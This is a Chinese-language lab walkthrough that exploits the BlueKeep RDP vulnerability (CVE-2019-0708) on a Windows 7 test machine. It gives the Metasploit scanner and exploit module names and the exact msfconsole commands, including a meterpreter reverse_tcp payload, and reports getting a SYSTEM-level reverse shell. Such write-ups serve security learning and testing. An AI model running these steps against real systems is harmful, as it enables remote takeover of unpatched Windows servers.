CVE-2019-0708 RDP远程桌面漏洞测试

**脚本小子的狂喜系列**

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,对于windows用户远程桌面图形化连接是很必要的,不论是公网尤其是内网,若系统不修复相关补丁,危害性可想而知。

实验环境:

26398-7eksykaik3p.png
Kali的2020年1月版中msf框架已经集成了cve20190708的相关脚本

其中:auxiliary/scanner/rdp/cve_2019_0708_bluekeep为检测模块
exploit/windows/rdp/cve_2019_0708_bluekeep_rce为渗透模块
Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

68122-oisutlgpsk.png

目标主机为windows7系统,系统信息如图
81227-tfaeyyws8pi.png

同时开启我们的远程桌面功能,启动3389端口
73806-y2klsy4124.png

模块测试
nmap 扫描目标主机端口,3389端口开放
62359-41i2wh4t07s.png
配置扫描模块后运行,可见目标是存在漏洞的
99627-q736bjitsws.png

使用渗透模块,配置相关选项

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 目标IP
rhosts => 192.168.1.2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload 设置使用的payload
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

79864-2ndrkjzzvxq.png

target选项是需要配置的,默认0自动选择目标系统时会报错,show targets查看
模块为不同的主机有预设,我测试虚拟机装的是VMware15,但我这里选择了1就可
34742-1vftvqlqlwz.png
34852-c9nd4ud9wrk.png

启动渗透模块,约半分钟获取反弹shell
我测试了几次也没有出现目标蓝屏的情况
88099-p4dgbxbavi.png
shell的权限为system系统权限
93386-2wrul5ils1q.png
TCP连接建立
32002-hntf1dpmqu.png

[1]: